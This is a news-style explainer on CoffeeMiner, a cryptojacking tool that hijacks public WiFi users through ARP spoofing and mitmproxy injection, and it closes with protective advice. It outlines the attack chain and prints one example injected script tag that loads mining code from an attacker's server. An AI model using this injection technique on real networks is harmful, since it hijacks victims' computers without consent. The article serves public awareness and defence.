Amid the cryptocurrency frenzy, the crypto world has woken up to news of a trending cryptojacking tool called CoffeeMiner. Apparently, anyone running this tool can mine coins anonymously using the CPUs of people who have a penchant for free public WiFi and don’t use a VPN.

Lately, interest in cryptocurrencies has been growing owing to the sudden surge in the value of BTC and ETH. Ransomware attacks in 2017, led by WannaCry and Petya/NotPetya, were cyberattackers’ way of getting funds. But the emergence of CoffeeMiner will undoubtedly mark another “peak coinjack.”

What Is CoffeeMiner?

CoffeeMiner is an open-source Python application built by a Barcelona-based software developer called Arnau Code, and it stealthily executes a “man-in-the-middle” (MiTM) attack. Essentially, the tool injects JavaScript code into each website visited by anyone using the WiFi and then uses their CPUs to mine cryptocurrencies that are mineable via JavaScript.

A “man-in-the-middle” attack is where there’s a middleman on the network who, unknown to you, gets to see all your network requests before they reach their destinations. That person also receives all replies before they get to your PC and can even alter them. And that is precisely what CoffeeMiner does: it intercepts your web traffic before it reaches the network’s access point, covertly picks up the web page, and ‘sneaks’ a line of JavaScript into the reply.

The whole process isn’t elaborate for a smart person. The attack is executed by spoofing Address Resolution Protocol (ARP) messages with dsniff (an open-source product), which seizes traffic on the network. It then uses mitmproxy (an open-source toolkit) to inject JavaScript into the sites that users of the network visit. The process is so clean that an ordinary user won’t notice.

The miner is served via an HTTP server, as the attackers reroute unsuspecting victims to a server that's under their control. All these hackers need is as little as 40 seconds of the victim visiting a given website.

What CoffeeMiner Man In The Middle Cryptojacking Does

  • Tricks your device into thinking the attacker's machine is the WiFi’s access point – using dsniff.
  • Passes on your traffic, except web requests. It pushes those requests into a MiTM proxy – using mitmproxy.
  • Secretly inserts a line of HTML that loads coin-mining JavaScript into the reply.

The line can be something like this: <script src="http://192.0.2.42:8000/script.js"></script>, where 192.0.2.42:8000 is the server running on the attacker's computer and script.js is the crypto-mining code. The developer opted for a favorite miner called CoinHive, which is capable of mining Monero coins.

According to its developer, public WiFi might now become a source of income for the hacker. The project was released for academic study, but it builds on a recent discovery on an Argentinian Starbucks Wi-Fi network. The developer also says the tool works, having tested it in real-life scenarios.

How To Protect Yourself From CoffeeMiner

Anyone who loves free WiFi can be a victim. The main risk is using an untrusted network, since a rogue attacker could be using it to mess with unencrypted web traffic. Without HTTPS there is no confidentiality, identification, or integrity. To be safe, therefore, only use sites that use HTTPS, use a VPN if you can’t live without free WiFi, and try to watch out!
